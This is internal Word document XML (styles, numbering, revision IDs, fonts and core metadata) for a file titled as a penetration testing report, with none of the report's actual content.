                              </w:r>
                              <w:r w:rsidR="00C2084A">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                </w:rPr>
                                <w:t>Wo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rdy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8A4128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4A913AF" w14:textId="20A5A075" w:rsidR="00FD6D45" w:rsidRDefault="00FD6D4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penetration testing report - ha </w:t>
                        </w:r>
                        <w:r w:rsidR="00C2084A">
                          <w:rPr>
                            <w:caps/>
                            <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          </w:rPr>
                          <w:t>Wo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rdy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402F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DC81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31930"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4C82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A3231"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7ED68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53D6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19FAE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71A9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAD82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421401">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1573738893">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1517957250">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2063600920">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1118447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45"/>
    <w:rsid w:val="00047726"/>
    <w:rsid w:val="00074908"/>
    <w:rsid w:val="00082513"/>
    <w:rsid w:val="00117CDC"/>
    <w:rsid w:val="001564DB"/>
    <w:rsid w:val="002C1770"/>
    <w:rsid w:val="002F129A"/>
    <w:rsid w:val="002F131D"/>
    <w:rsid w:val="002F7043"/>
    <w:rsid w:val="00382ACE"/>
    <w:rsid w:val="003C5A82"/>
    <w:rsid w:val="003D6500"/>
    <w:rsid w:val="00426D1B"/>
    <w:rsid w:val="0043573A"/>
    <w:rsid w:val="00443380"/>
    <w:rsid w:val="004B120D"/>
    <w:rsid w:val="004D00EF"/>
    <w:rsid w:val="004F3CB5"/>
    <w:rsid w:val="00554903"/>
    <w:rsid w:val="005626F1"/>
    <w:rsid w:val="005C7422"/>
    <w:rsid w:val="0063182F"/>
    <w:rsid w:val="00675449"/>
    <w:rsid w:val="006B4AF9"/>
    <w:rsid w:val="006C48F7"/>
    <w:rsid w:val="00715DA4"/>
    <w:rsid w:val="00766E25"/>
    <w:rsid w:val="007B7977"/>
    <w:rsid w:val="007C2607"/>
    <w:rsid w:val="008045A5"/>
    <w:rsid w:val="0081236A"/>
    <w:rsid w:val="008A3FC5"/>
    <w:rsid w:val="008A5485"/>
    <w:rsid w:val="008D5139"/>
    <w:rsid w:val="008D7D22"/>
    <w:rsid w:val="008E6A6C"/>
    <w:rsid w:val="00916146"/>
    <w:rsid w:val="00925902"/>
    <w:rsid w:val="009270D4"/>
    <w:rsid w:val="0094616C"/>
    <w:rsid w:val="009D4B58"/>
    <w:rsid w:val="00A53616"/>
    <w:rsid w:val="00A95E16"/>
    <w:rsid w:val="00AD44B0"/>
    <w:rsid w:val="00B373D3"/>
    <w:rsid w:val="00B37654"/>
    <w:rsid w:val="00BB794E"/>
    <w:rsid w:val="00BE2BA1"/>
    <w:rsid w:val="00C16087"/>
    <w:rsid w:val="00C166BC"/>
    <w:rsid w:val="00C2084A"/>
    <w:rsid w:val="00CB7C1B"/>
    <w:rsid w:val="00CC52EF"/>
    <w:rsid w:val="00D26ACE"/>
    <w:rsid w:val="00DA6495"/>
    <w:rsid w:val="00DB7596"/>
    <w:rsid w:val="00E35414"/>
    <w:rsid w:val="00E62AEE"/>
    <w:rsid w:val="00E67EBF"/>
    <w:rsid w:val="00E77C67"/>
    <w:rsid w:val="00EB132B"/>
    <w:rsid w:val="00EB6C90"/>
    <w:rsid w:val="00ED3823"/>
    <w:rsid w:val="00FC24EC"/>
    <w:rsid w:val="00FD6D45"/>
    <w:rsid w:val="00FE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00643"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{76206A6F-CD58-4EB9-9424-19771367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6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D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D45"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD6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D45"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00FD6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6D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D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A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AF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glossaryDocument" Target="glossary/document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17CBD3CE85D447D8A3697FBA53DE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FE253C-2CD1-4A2F-AA70-DB54084D0F41}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D87471" w:rsidRDefault="008E794A" w:rsidP="008E794A">
          <w:pPr>
            <w:pStyle w:val="217CBD3CE85D447D8A3697FBA53DE470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84FAAAFB883F4EE09177432BD3C6E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DA392-D12D-4E3C-94F5-0E2BEF797A5B}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00D87471" w:rsidRDefault="008E794A" w:rsidP="008E794A">
          <w:pPr>
            <w:pStyle w:val="84FAAAFB883F4EE09177432BD3C6E52E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osefin Sans">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00000FF" w:usb1="4000204B" w:usb2="00000000" w:usb3="00000000" w:csb0="00000193" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Mul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4A"/>
    <w:rsid w:val="000460F7"/>
    <w:rsid w:val="003E0175"/>
    <w:rsid w:val="00525A8C"/>
    <w:rsid w:val="0063182F"/>
    <w:rsid w:val="006C48F7"/>
    <w:rsid w:val="008D5139"/>
    <w:rsid w:val="008E794A"/>
    <w:rsid w:val="0091061E"/>
    <w:rsid w:val="00D26ACE"/>
    <w:rsid w:val="00D87471"/>
    <w:rsid w:val="00DB3B74"/>
    <w:rsid w:val="00E35414"/>
    <w:rsid w:val="00E67EBF"/>
    <w:rsid w:val="00EB37AC"/>
    <w:rsid w:val="00ED3823"/>
    <w:rsid w:val="00ED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7CBD3CE85D447D8A3697FBA53DE470">
    <w:name w:val="217CBD3CE85D447D8A3697FBA53DE470"/>
    <w:rsid w:val="008E794A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="84FAAAFB883F4EE09177432BD3C6E52E">
    <w:name w:val="84FAAAFB883F4EE09177432BD3C6E52E"/>
    <w:rsid w:val="008E79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18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- ha hardy</vt:lpstr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- ha Wordy</dc:title>
  <dc:subject/>
  <dc:creator>Sufiyan Shaikh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sufiyan Shaikh</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-27T15:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-04T13:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>